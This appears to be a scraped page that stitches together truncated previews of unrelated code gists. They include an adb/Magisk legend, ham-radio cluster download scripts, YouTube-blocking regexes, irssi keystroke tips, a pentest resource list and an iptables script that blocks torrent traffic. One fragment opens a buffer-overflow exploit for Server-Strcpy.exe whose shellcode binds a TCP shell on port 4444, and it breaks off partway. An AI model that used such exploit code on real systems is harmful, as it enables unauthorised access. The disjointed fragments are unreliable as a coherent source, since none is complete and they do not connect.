💻 => the device running adb
(usually a PC)
📱 => the device where Magisk is going to be installed (usually a Phone or Tablet)
Learn how to send emails through Gmail SMTP with Cloudflare Email Routing in this comprehensive guide.
To proceed with this method, ensure that you have enabled two-factor authentication for your Google account. If you haven't done so already, you can follow the link to set it up → Enable 2FA in your Google account.
#!/bin/bash | |
echo 'Downloading CTY.DAT' | |
wget -q https://www.country-files.com/cty/cty.dat -P ~/spider/local_data/ | |
echo 'Downloading WPXLOC.RAW' | |
wget -q https://www.country-files.com/cty/wpxloc.raw -P ~/spider/local_data/ | |
echo 'Creating Prefixes' | |
~/spider/perl/create_prefix.pl | |
echo '' | |
echo 'Log into the cluster as Sysop and type: load/prefix' | |
read -n 1 -r -s -p $'Press [Enter] to login as Sysop...\n' |
Blok Youtube Web | |
^.+(youtube).*$|o-o.preferred.pttelkom-|a.youtube.com|b.youtube.com|c.youtube.com|d.youtube.com|e.youtube.com|f.youtube.com| g.youtube.com|h.youtube.com|i.youtube.com|j.youtube.com|l.youtube.com”|googlevideo.com|(facebook.com).*$ | |
Blok Youtube App | |
^.+(youtube.com|www.youtube.com|m.youtube.com|ytimg.com|s.ytimg.com|ytimg.l.google.com|youtube.l.google.com|i.google.com|googlevideo.com|youtu.be).*$ |
src :
- https://joost.vunderink.net/blog/2011/12/02/irssi-tricks-navigating-around/
- https://www.linode.com/docs/applications/messaging/using-irssi-for-internet-relay-chat
Let’s start by what you can do while typing. These keystrokes change only what happens on the input line (the line where you type stuff).
arrow left/right: move one character left or right.
dhcp-script=/etc/detect_new_device.sh
Reference:
Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*
- Reconnaissance
- Passive/Semi-Passive
- Tools
- Passive/Semi-Passive
- Discover - https://github.com/leebaird/discover
#!/bin/bash | |
# TODO: skip tiny files (so small they couldn't be photos) | |
# TODO: make sure sym links and other file system oddities are handled | |
# TODO: look at paralellization for perf boost | |
# | |
# Constants | |
# | |
CHAR_COUNT=12 | |
BLOCK_COUNT=6 |
#!/usr/bin/env python | |
# Server-Strcpy.exe exploit by superkojiman | |
# http://blog.techorganic.com | |
import socket, sys | |
def main(target, port): | |
# 368 bytes, opens a bind TCP shell on port 4444 | |
shellcode = ( | |
"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" + |
#!/bin/sh | |
# block torrent traffic by iptable/firewall for VPN/Proxy server | |
# [email protected] | |
# Delete all existing rules | |
iptables -F | |
# Set default chain policies | |
iptables -P INPUT DROP | |
iptables -P FORWARD DROP |